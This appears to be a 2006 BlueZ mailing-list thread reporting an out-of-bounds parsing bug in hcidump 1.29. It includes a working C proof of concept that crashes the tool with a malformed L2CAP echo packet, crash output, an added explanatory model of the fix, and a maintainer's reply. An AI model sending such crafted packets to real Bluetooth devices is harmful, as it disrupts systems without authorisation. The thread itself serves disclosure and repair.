* [Bluez-devel] Bug in l2cap.c
From: Pierre BETOUIN @ 2006-01-18 17:47 UTC (permalink / raw)
To: bluez-devel
[-- Attachment #1.1: Type: text/plain, Size: 1609 bytes --]
Hi list,
Currently pentesting several Bluetooth devices, I found a bug in hcidump
(tested version: 1.29).
The affected code, located in l2cap.c, is:
------------------------------------------------------------------
while (frm->len >= L2CAP_CMD_HDR_SIZE) {
	l2cap_cmd_hdr *hdr = frm->ptr;

	frm->ptr += L2CAP_CMD_HDR_SIZE;
	frm->len -= L2CAP_CMD_HDR_SIZE;

	if (!p_filter(FILT_L2CAP)) {
		p_indent(level, frm);
		printf("L2CAP(s): ");
	}

	switch (hdr->code) {
	(...)
	default:
		if (p_filter(FILT_L2CAP))
			break;

		printf("code 0x%2.2x ident %d len %d\n",
			hdr->code, hdr->ident, btohs(hdr->len));
		raw_dump(level, frm);
	}

	/* hdr->len is taken from the packet and never compared with frm->len */
	frm->ptr += btohs(hdr->len);
	frm->len -= btohs(hdr->len);
}
------------------------------------------------------------------
# ./hcidump-crash 00:80:09:XX:XX:XX
L2CAP packet sent (15)
Buffer: 08 01 0B 00 41 41 41 41 41 41 41 41 41 41 41
# hcidump
HCI sniffer - Bluetooth packet analyzer ver 1.29
device: hci0 snap_len: 1028 filter: 0xffffffff
< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
< ACL data: handle 41 flags 0x02 dlen 19
L2CAP(s): debug : code=8
Echo req: dlen 12
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
(...)
L2CAP(s): debug : code=0
code 0x00 ident 0 len 0
segmentation fault
The PoC source file is attached.
Pierre
--
Pierre BETOUIN
info16@unsigned.ath.cx
http://securitech.homeunix.org
GPG Key : 0x94D9CB23
[-- Attachment #1.2: hcidump-crash.c --]
[-- Type: text/x-csrc, Size: 1814 bytes --]
/* hcidump v. 1.29 bluez */
/* Pierre BETOUIN <pierre.betouin@security-labs.org> */
/* 01/18/06 */
/* Crashes hcidump sending bad L2CAP packet */
/* */
/* gcc -lbluetooth hcidump-crash.c -o hcidump-crash */
/* ./hcidump-crash 00:80:37:XX:XX:XX */
/* L2CAP packet sent (15) */
/* Buffer: 08 01 0C 00 41 41 41 41 41 41 41 41 41 41 41 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>		/* memset() */
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/l2cap.h>

#define SIZE		15	/* bytes actually sent: 4-byte command header + 11-byte body */
#define FAKE_SIZE	12	/* length claimed in the header: one byte more than the body */

int main(int argc, char **argv)
{
	char *buffer;
	l2cap_cmd_hdr *cmd;
	struct sockaddr_l2 addr;
	int sock, sent, i;

	if (argc < 2) {
		fprintf(stderr, "%s <btaddr>\n", argv[0]);
		exit(EXIT_FAILURE);
	}

	/* Raw L2CAP socket: the payload is delivered on the signalling
	 * channel, which is where hcidump parses it as L2CAP(s) */
	if ((sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
		perror("socket");
		exit(EXIT_FAILURE);
	}

	memset(&addr, 0, sizeof(addr));
	addr.l2_family = AF_BLUETOOTH;

	if (bind(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
		perror("bind");
		exit(EXIT_FAILURE);
	}

	str2ba(argv[1], &addr.l2_bdaddr);

	if (connect(sock, (struct sockaddr *) &addr, sizeof(addr)) < 0) {
		perror("connect");
		exit(EXIT_FAILURE);
	}

	if (!(buffer = (char *) malloc(SIZE + 1))) {
		perror("malloc");
		exit(EXIT_FAILURE);
	}

	/* Fill the whole packet with 'A', then overlay the command header */
	memset(buffer, 'A', SIZE);
	cmd = (l2cap_cmd_hdr *) buffer;
	cmd->code = L2CAP_ECHO_REQ;
	cmd->ident = 1;
	cmd->len = htobs(FAKE_SIZE);	/* L2CAP fields are little-endian */

	if ((sent = send(sock, buffer, SIZE, 0)) >= 0)
		printf("L2CAP packet sent (%d)\n", sent);

	printf("Buffer:\t");
	for (i = 0; i < sent; i++)
		printf("%.2X ", (unsigned char) buffer[i]);
	printf("\n");

	free(buffer);
	close(sock);

	return EXIT_SUCCESS;
}
[-- Attachment #2: This is a digitally signed message part --]
[-- Type: application/pgp-signature, Size: 189 bytes --]
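The loop from the excerpt above, reduced to its cursor arithmetic and placed next to the bounds check it lacks. This is an added example, not hcidump's code and not part of the original post: it does not dereference anything past the buffer, it only reports where the cursor ends up. POC_PKT is the 15-byte signalling payload the attached PoC sends (length field 0x000C, as in the source); GOOD_PKT, a well-formed Echo Request followed by an Echo Response, is constructed here to show the checked walker still accepts normal traffic. The walk_result struct and both walk_* functions are names chosen for this example.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

#define L2CAP_CMD_HDR_SIZE 4	/* code(1) ident(1) len(2), as in <bluetooth/l2cap.h> */
#define L2CAP_ECHO_REQ     0x08
#define L2CAP_ECHO_RSP     0x09

/* Constructed inputs. POC_PKT: Echo Request, ident 1, len 12, but only 11
 * body bytes follow. GOOD_PKT: Echo Request with a 4-byte body, then an
 * Echo Response with an empty body. */
const uint8_t POC_PKT[] = {
	0x08, 0x01, 0x0C, 0x00,
	0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};
const uint8_t GOOD_PKT[] = {
	L2CAP_ECHO_REQ, 0x01, 0x04, 0x00, 0x41, 0x41, 0x41, 0x41,
	L2CAP_ECHO_RSP, 0x01, 0x00, 0x00
};

struct walk_result {
	int cmds;	/* commands whose header and body both lay inside the frame */
	int overrun;	/* cursor ended up past the end of the frame */
	int rejected;	/* a command was dropped because its len exceeded what was left */
};

static uint16_t le16(const uint8_t *p)
{
	return (uint16_t)(p[0] | (p[1] << 8));	/* L2CAP fields are little-endian */
}

/* The hcidump 1.29 loop: after the header, ptr/len are advanced by hdr->len
 * without checking that many bytes remain. hcidump kept going from there
 * (the trace above shows "code 0x00 ident 0 len 0" until the segfault);
 * this model stops and reports the overrun instead. */
struct walk_result walk_unchecked(const uint8_t *buf, size_t buflen)
{
	struct walk_result r = {0, 0, 0};
	const uint8_t *ptr = buf, *end = buf + buflen;
	size_t len = buflen;

	while (len >= L2CAP_CMD_HDR_SIZE) {
		uint16_t clen = le16(ptr + 2);

		ptr += L2CAP_CMD_HDR_SIZE;
		len -= L2CAP_CMD_HDR_SIZE;

		ptr += clen;			/* the unguarded advance from the excerpt */
		if (ptr > end) {		/* body claims more than the frame holds */
			r.overrun = 1;
			break;
		}
		len -= clen;
		r.cmds++;
	}
	return r;
}

/* Same walk with the missing check: a command whose len field exceeds the
 * remaining payload is rejected and parsing of this frame stops. */
struct walk_result walk_checked(const uint8_t *buf, size_t buflen)
{
	struct walk_result r = {0, 0, 0};
	const uint8_t *ptr = buf;
	size_t len = buflen;

	while (len >= L2CAP_CMD_HDR_SIZE) {
		uint16_t clen = le16(ptr + 2);

		ptr += L2CAP_CMD_HDR_SIZE;
		len -= L2CAP_CMD_HDR_SIZE;

		if (clen > len) {		/* truncated or lying length field */
			r.rejected = 1;
			break;
		}
		ptr += clen;
		len -= clen;
		r.cmds++;
	}
	return r;
}

static void report(const char *name, struct walk_result r)
{
	printf("%-22s cmds=%d overrun=%d rejected=%d\n",
	       name, r.cmds, r.overrun, r.rejected);
}

int main(void)
{
	report("unchecked, PoC", walk_unchecked(POC_PKT, sizeof POC_PKT));
	report("checked,   PoC", walk_checked(POC_PKT, sizeof POC_PKT));
	report("unchecked, good", walk_unchecked(GOOD_PKT, sizeof GOOD_PKT));
	report("checked,   good", walk_checked(GOOD_PKT, sizeof GOOD_PKT));
	return 0;
}
```

The only difference between the two walkers is the `clen > len` comparison before the advance; on the PoC packet it is the difference between a rejected command and a cursor one byte past the end of a 15-byte frame that raw_dump() is then asked to print from.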
* Re: [Bluez-devel] Bug in l2cap.c
From: Marcel Holtmann @ 2006-01-18 17:54 UTC (permalink / raw)
To: bluez-devel
Hi Pierre,
> Currently pentesting several bluetooth devices, I found a bug in hcidump
> (tested version : 1.29).
you know that hcidump is a testing/development utility? It is basically
not supposed to be fully robust against malicious packets.
Feel free to provide a patch and not an exploit.
Regards
Marcel
_______________________________________________
Bluez-devel mailing list
Bluez-devel@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/bluez-devel
* Re: [Bluez-devel] Bug in l2cap.c
From: Pierre BETOUIN @ 2006-01-18 18:16 UTC (permalink / raw)
To: bluez-devel
[-- Attachment #1: Type: text/plain, Size: 767 bytes --]
Hi Marcel,
On Wednesday 18 January 2006 at 18:54 +0100, Marcel Holtmann wrote:
> Hi Pierre,
>
> > Currently pentesting several bluetooth devices, I found a bug in hcidump
> > (tested version : 1.29).
>
> you know that hcidump is a testing/development utility? It is basically
> not supposed to be fully robust against malicious packets.
True, one more reason to correct this then, I agree with you ;)
> Feel free to provide a patch and not an exploit.
The patch is (nearly) in my previous mail: check it, I gave you the short piece
of code concerned; it should not give you a headache fixing it.
> Regards
>
> Marcel
Regards,
Pierre
--
Pierre BETOUIN
info16@unsigned.ath.cx
http://securitech.homeunix.org
GPG Key : 0x94D9CB23
[-- Attachment #2: This is a digitally signed message part --]
[-- Type: application/pgp-signature, Size: 189 bytes --]